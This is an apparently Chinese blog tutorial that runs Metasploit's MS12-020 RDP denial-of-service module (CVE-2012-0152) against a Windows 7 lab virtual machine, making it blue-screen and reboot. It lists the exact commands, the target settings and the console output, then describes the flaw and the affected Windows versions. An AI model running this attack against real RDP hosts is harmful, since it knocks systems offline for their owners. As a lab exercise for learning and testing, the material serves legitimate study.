简介

今天玩点特别的，让windows7直接蓝屏重启

准备

• 一台windows7虚拟机
• metasploit
• 注意两台电脑要在同一网段上

要求

windows7 必须允许远程桌面连接，就是允许别的电脑远程连接这台电脑

操作

首先两台电脑相互ping一下，看看是不是可以连通
然后打开metasploit
msfconsole
输入
search maxchannel
先查找一下这个模块，然后
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
show options
查看一下配置参数

msf auxiliary(ms12_020_maxchannelids) > show options

Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  3389             yes       The target port (TCP)

设置目标ip
set RHOST 192.168.1.108
执行
exploit
输出

msf auxiliary(ms12_020_maxchannelids) > exploit

[*] 192.168.1.108:3389 - 192.168.1.108:3389 - Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS
[*] 192.168.1.108:3389 - 192.168.1.108:3389 - 210 bytes sent
[*] 192.168.1.108:3389 - 192.168.1.108:3389 - Checking RDP status...
[+] 192.168.1.108:3389 - 192.168.1.108:3389 seems down
[*] Auxiliary module execution completed
msf auxiliary(ms12_020_maxchannelids) > 

效果

蓝屏，重启

原理

使用了 CVE-2012-0152 远程桌面协议RDP拒绝访问漏洞(MS12-020)

漏洞描述

BUGTRAQ ID: 52354 CVE ID: CVE-2012-0152 远程桌面协议（RDP, Remote Desktop Protocol）是一个多通道（multi-channel）的协议，让用户（客户端或称“本地电脑”）连上提供微软终端机服务的电脑（服务器端或称“远程电脑”）。 Windows在处理某些RDP报文时Terminal Server 存在错误，可被利用造成服务停止响应。

漏洞影响的系统版本

• Microsoft Windows XP Professional
• Microsoft Windows XP Home
• Microsoft Windows Server 2003 Standard Edition
• Microsoft Windows Server 2003 Enterprise Edition
• Microsoft Windows Server 2003 Datacenter Edition
• Microsoft Windows 7